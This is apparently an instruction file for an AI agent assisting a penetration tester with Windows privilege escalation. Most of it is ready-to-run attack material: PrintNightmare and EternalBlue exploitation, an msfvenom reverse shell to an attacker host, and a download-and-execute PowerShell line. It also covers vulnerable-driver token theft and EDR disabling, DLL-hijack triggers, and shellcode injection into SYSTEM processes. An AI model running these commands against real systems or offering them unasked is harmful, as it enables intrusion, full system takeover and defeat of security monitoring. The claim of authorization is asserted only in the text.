Windows Kernel Exploits & Privileged Operations

You are helping a penetration tester exploit kernel vulnerabilities, vulnerable drivers, and privileged file/pipe operations on a Windows system. All testing is under explicit written authorization.

Warning: Kernel exploits can crash the target system. Always warn before execution. Prefer reliable exploits and avoid experimental PoCs on production systems.

Engagement Logging

Check for ./engagement/ directory. If absent, proceed without logging.

When an engagement directory exists:

• Print [windows-kernel-exploits] Activated → <target> to the screen on activation.
• Evidence → save significant output to engagement/evidence/ with descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).

State Management

Call get_state_summary() from the state MCP server to read current engagement state. Use it to:

• Skip re-testing targets, parameters, or vulns already confirmed
• Leverage existing credentials or access for this technique
• Understand what's been tried and failed (check Blocked section)

Your return summary must include:

• New targets/hosts discovered (with ports and services)
• New credentials or tokens found
• Access gained or changed (user, privilege level, method)
• Vulnerabilities confirmed (with status and severity)
• Pivot paths identified (what leads where)
• Blocked items (what failed and why, whether retryable)

Prerequisites

• Shell access on Windows (cmd.exe, PowerShell)
• systeminfo output (for exploit matching)
• Ability to transfer and execute binaries on target
• Some exploits require specific privileges (SeLoadDriverPrivilege for BYOVD)

Step 1: Assess — OS Version and Patch Level

Collect the information needed to match against known kernel CVEs.

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"
ver
wmic os get Caption, Version, BuildNumber, OSArchitecture

Save systeminfo output for offline analysis:

systeminfo > C:\Windows\Temp\systeminfo.txt

Key information to note:

• OS name and version (e.g., Windows 10 Pro 1903)
• Build number (e.g., 18362)
• Architecture (x86 vs x64)
• Hotfix list and count
• Domain membership

Check loaded drivers (for BYOVD):

driverquery /v /fo table
driverquery /si

Step 2: Exploit Suggester

Use automated tools to match the target's patch level against known kernel CVEs.

WES-NG (Primary — Run on Attacker Machine)

# Update vulnerability database
python3 wes.py --update

# Analyze systeminfo output
python3 wes.py systeminfo.txt

# Filter for specific impact
python3 wes.py systeminfo.txt --impact "Elevation of Privilege"
python3 wes.py systeminfo.txt --exploits-only

Watson (On Target — .NET 2.0+)

Watson.exe

Watson checks for: CVE-2019-0836, CVE-2019-0841, CVE-2019-1064, CVE-2019-1130, CVE-2019-1253, CVE-2019-1315, CVE-2019-1385, CVE-2019-1388, CVE-2019-1405, CVE-2020-0668, CVE-2020-0683, CVE-2020-1013, and more.

Legacy windows-exploit-suggester

./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2024-01-01-mssb.xlsx --systeminfo systeminfo.txt

Triage Results

Prioritize by:

1. Reliability — exploits with public, stable PoCs
2. Impact — SYSTEM shell vs arbitrary write
3. Crash risk — avoid pool corruption exploits on production
4. Architecture match — x86 vs x64 binary must match target

Step 3: Named Kernel CVE Exploitation

PrintNightmare Local (CVE-2021-1675 / CVE-2021-34527)

Print Spooler RCE that also works for local privilege escalation. Loads a DLL as SYSTEM via the Print Spooler service.

Affected: Windows with Print Spooler running, pre-July 2021 patches.

Check vulnerability:

# Check if Print Spooler RPC is available
python3 rpcdump.py @TARGET | egrep 'MS-RPRN|MS-PAR'

:: Check Spooler service status
sc query Spooler

Local privilege escalation (LPE):

# SharpPrintNightmare — direct LPE
SharpPrintNightmare.exe C:\Windows\Temp\payload.dll

# Invoke-Nightmare (PowerShell) — adds local admin
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare  # Default: adds adm1n/P@ssw0rd
Invoke-Nightmare -NewUser "hacker" -NewPassword "Passw0rd!"
Invoke-Nightmare -DLL "C:\absolute\path\to\payload.dll"

# Mimikatz (v2.2.0+)
misc::printnightmare /server:localhost /library:C:\Windows\Temp\payload.dll

Remote exploitation (requires SMB or WebDAV share):

# Host payload DLL via Impacket SMB
python3 smbserver.py share /tmp/smb/

# Remote exploit
python3 CVE-2021-1675.py domain/user:Pass@TARGET '\\ATTACKER\share\payload.dll'

# SharpPrintNightmare remote
SharpPrintNightmare.exe '\\ATTACKER\share\payload.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_*\Amd64\UNIDRV.DLL' '\\TARGET'

Error codes: 0x5 = share permissions issue, 0x525 = account doesn't exist, 0x180 = use SMBv3 instead of v2.

MS17-010 EternalBlue (CVE-2017-0144)

Affected: Windows 7, 2008 R2, 2003, XP (pre-KB4013389). Remote SYSTEM RCE via SMB.

Detection:

nmap -Pn -p445 --script smb-vuln-ms17-010 TARGET
netexec smb TARGET -M ms17-010

Exploitation:

# Metasploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS TARGET
set LHOST ATTACKER
run

# Standalone (Python2)
git clone https://github.com/helviojunior/MS17-010
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe
python2 send_and_execute.py TARGET shell.exe

MS16-032 (CVE-2016-0099) — Secondary Logon Handle Leak

Affected: Windows 7, 8, 10, 2008, 2012 R2 (pre-KB3139914). Local escalation.

wmic qfe list | findstr "3139914"

If patch not found:

# PowerShell exploit
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1')
Invoke-MS16032 -Command "cmd /c start cmd.exe"

# Metasploit
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

MS15-051 (CVE-2015-1701) — Win32k Client Copy Image

Affected: Windows 2003, 2008, 7, 8, 2012. Local SYSTEM escalation.

:: Usage
ms15-051.exe "whoami"
ms15-051.exe "cmd.exe /c net localgroup administrators user /add"

MS10-015 KiTrap0D (CVE-2010-0232)

Affected: Windows NT, 2000, 2003, 2008, XP, Vista, 7. Local SYSTEM.

# Metasploit
use exploit/windows/local/ms10_015_kitrap0d

CVE-2019-1388 — Certificate Dialog Elevation

Affected: Windows 7, Windows 10 LTSC 10240. Interactive desktop required.

1. Right-click hhupd.exe → Run as administrator
2. Click "Show information about the publisher's certificate"
3. Click the "Issued by" URL link
4. Browser opens as SYSTEM — use File → Open to launch cmd.exe

Note: Requires interactive desktop access. Does not work via remote shell.

CVE-2020-0796 SMBGhost

Affected: Windows 10 1903-1909, Server v1903-v1909.

Primarily remote RCE but local LPE variants exist. Exploit reliability is low — use only as a last resort.

Kernel CVE Quick Reference

Step 4: BYOVD (Bring Your Own Vulnerable Driver)

Load a known-vulnerable signed kernel driver to gain arbitrary kernel read/write, then use it to steal the SYSTEM token.

Prerequisites

• Admin access or SeLoadDriverPrivilege
• Vulnerable driver binary (signed, so Windows loads it)
• Kernel offsets for target OS version

Known Vulnerable Drivers

Reference: https://www.loldrivers.io/ — curated database of vulnerable drivers with hashes and CVE references.

Enumerate Loaded Drivers

driverquery /v /fo table
driverquery /si

Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer, InfName | Format-Table

Generic BYOVD Workflow

1. Load the vulnerable driver:

sc create VulnDriver type=kernel binPath=C:\Windows\Temp\vuln.sys
sc start VulnDriver

2. Exploit the driver for kernel R/W (tool-specific — see driver documentation)

3. Token theft — copy SYSTEM token to current process:

The standard kernel exploitation primitive: walk the EPROCESS linked list to find PID 4 (SYSTEM), read its token, and overwrite the current process's token.

// Pseudocode (EPROCESS offsets vary per OS build)
1. Get ntoskrnl base via EnumDeviceDrivers or NtQuerySystemInformation
2. Resolve PsInitialSystemProcess → SYSTEM EPROCESS address
3. Walk ActiveProcessLinks to find current process EPROCESS
4. Read SYSTEM token (EPROCESS + Token offset), mask EX_FAST_REF low bits
5. Write SYSTEM token to current process EPROCESS
6. Spawn cmd.exe → now running as SYSTEM

EPROCESS offsets (must be resolved per build via WinDbg symbols):

• UniqueProcessId: ~0x440
• ActiveProcessLinks: ~0x448
• Token: ~0x4b8
• EX_FAST_REF mask: & ~0xF

4. Cleanup:

sc stop VulnDriver
sc delete VulnDriver

BYOVD for EDR Bypass

Vulnerable drivers can also be used to disable EDR/PPL protections:

• Kill protected processes by zeroing their token
• Unload EDR kernel callbacks
• Disable PPL (Protected Process Light) on LSASS

Tools: PPLKiller, EDRSandblast, KDU (Kernel Driver Utility).

Step 5: Privileged File Write Exploits

These techniques exploit Windows services that load DLLs from predictable paths. You need the ability to write a DLL to the target path (often requires an arbitrary file write primitive or writable directory).

DiagHub (Pre-Windows 10 1903)

DiagnosticHub Standard Collector Service loads DLLs from System32.

:: Place payload DLL in System32 (requires write access)
copy payload.dll C:\Windows\System32\payload.dll

:: Trigger DLL load
diaghub.exe C:\ProgramData\ payload.dll

Tool: https://github.com/xct/diaghub

UsoDLLLoader (Windows 10 1903-2004)

Update Session Orchestrator loads WindowsCoreDeviceInfo.dll from System32.

:: Place DLL
copy payload.dll C:\Windows\System32\WindowsCoreDeviceInfo.dll

:: Trigger via USO
UsoDllLoader.exe

:: Alternative trigger
usoclient StartInteractiveScan

Result: Bind shell on port 1337 (default payload). Tool: https://github.com/itm4n/UsoDllLoader

WerTrigger (Windows Error Reporting)

WER service loads phoneinfo.dll from a predictable path.

:: Setup
copy phoneinfo.dll C:\Windows\System32\phoneinfo.dll

:: Trigger
WerTrigger.exe

Result: SYSTEM shell. Tool: https://github.com/sailay1996/WerTrigger

WerMgr (WER Directory Creation)

:: Setup
dircreate2system.exe

Creates wermgr.exe.local directory with weak permissions, loads DLL via DotLocal redirection. Tool: https://github.com/binderlabs/DirCreate2System

Privileged File Delete → SYSTEM (MSI Rollback)

An arbitrary file delete primitive can be escalated to SYSTEM via MSI rollback abuse:

1. Install a crafted MSI that triggers an error during installation
2. Exploit deletes C:\Config.Msi during rollback window
3. Recreate C:\Config.Msi with weak DACL
4. Drop malicious rollback files
5. Windows Installer executes rollback payload as SYSTEM

Tool: https://github.com/thezdi/PoC/tree/master/FilesystemEoPs/FolderOrFileDeleteToSystem

Post-exploit via On-Screen Keyboard:

1. Exploit writes HID.dll to C:\Program Files\Common Files\microsoft shared\ink\
2. Press Ctrl+Alt+Del → open On-Screen Keyboard
3. osk.exe loads HID.dll from ink directory → SYSTEM shell

Step 6: Named Pipe & Leaked Handle Exploitation

Named Pipe Impersonation

Create a named pipe, trick a privileged process into connecting, then impersonate its token. This is the foundation of all Potato exploits.

Core pattern (C):

// 1. Create named pipe
HANDLE hPipe = CreateNamedPipeA("\\\\.\\pipe\\evil",
    PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT,
    1, 0, 0, 0, NULL);

// 2. Wait for privileged client
ConnectNamedPipe(hPipe, NULL);

// 3. MUST read at least one message before impersonation
char buf[4]; DWORD rb;
ReadFile(hPipe, buf, sizeof(buf), &rb, NULL);

// 4. Impersonate client token
ImpersonateNamedPipeClient(hPipe);

// 5. Open impersonation token → duplicate to primary → CreateProcessWithTokenW

Common triggers to coerce privileged connections:

• Print Spooler RPC (ms-rprn pipe) → PrintSpoofer
• DCOM OXID resolver → RoguePotato
• MS-EFSR (EFS) pipe → EfsPotato
• Custom service coercion

For full Potato family exploitation, route to windows-token-impersonation.

Leaked Handle Exploitation

If a privileged process creates a child with bInheritHandles=TRUE, the child inherits open handles to privileged resources.

Enumerate inherited handles:

:: Sysinternals Handle tool
handle64.exe /a /p <PID>

Exploit inherited process handle:

// If inherited handle has PROCESS_ALL_ACCESS to a SYSTEM process:
// 1. Allocate memory in privileged process
LPVOID addr = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);

// 2. Write shellcode
WriteProcessMemory(hProc, addr, payload, payload_len, NULL);

// 3. Create thread in privileged process
HANDLE hThread;
RtlCreateUserThread(hProc, NULL, 0, 0, 0, 0, addr, NULL, &hThread, NULL);

Alternative — spawn child with privileged parent:

// Use inherited SYSTEM process handle as parent for new process
STARTUPINFOEXA si = {0};
SIZE_T size = 0;
InitializeProcThreadAttributeList(NULL, 1, 0, &size);
si.lpAttributeList = HeapAlloc(GetProcessHeap(), 0, size);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
UpdateProcThreadAttribute(si.lpAttributeList, 0,
    PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hProc, sizeof(HANDLE), NULL, NULL);
si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
CreateProcessA("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, TRUE,
    EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, NULL, NULL,
    (LPSTARTUPINFOA)&si, &pi);

Tools: LeakedHandlesFinder

Step 7: Restricted Shell Escape (Pre-Requisite)

If you're in a restricted shell, escape it before attempting kernel exploitation.

PowerShell Constrained Language Mode (CLM) Bypass

# Check current language mode
$ExecutionContext.SessionState.LanguageMode

# Downgrade to PowerShell v2 (if available — FullLanguage mode)
powershell -Version 2

AppLocker Bypass via LOLBins

:: MSBuild — compile and execute inline C#
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe task.xml

:: InstallUtil — execute .NET assembly
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe

:: regsvcs / regasm
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe payload.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe payload.dll /U

Step 8: Escalate or Pivot

Troubleshooting

Exploit crashes the target

Kernel exploits that corrupt pool memory can BSOD the system. Always check exploit notes for stability warnings. Prefer LPE exploits with "stable" or "reliable" tags. On production systems, try non-kernel vectors first (token impersonation, services, UAC).

"Access Denied" loading driver (BYOVD)

SeLoadDriverPrivilege or admin access is required. Check whoami /priv. If not available, escalate via other vectors first.

Exploit binary wrong architecture

x86 exploits fail on x64 and vice versa. Check systeminfo | findstr "System Type". Download the correct architecture binary. Some exploits (PrintNightmare DLL) must match the Spooler service architecture.

WES-NG reports many CVEs but none have public exploits

WES-NG lists all missing patches, not just exploitable ones. Filter with --exploits-only to show only CVEs with known public exploits. Cross-reference with https://github.com/SecWiki/windows-kernel-exploits for compiled binaries.

PrintNightmare fails with "not vulnerable"

Check: (1) Spooler service is running, (2) patches pre-July 2021, (3) no RestrictDriverInstallationToAdministrators registry key. On DCs, check if Pre Windows 2000 Compatibility group is populated.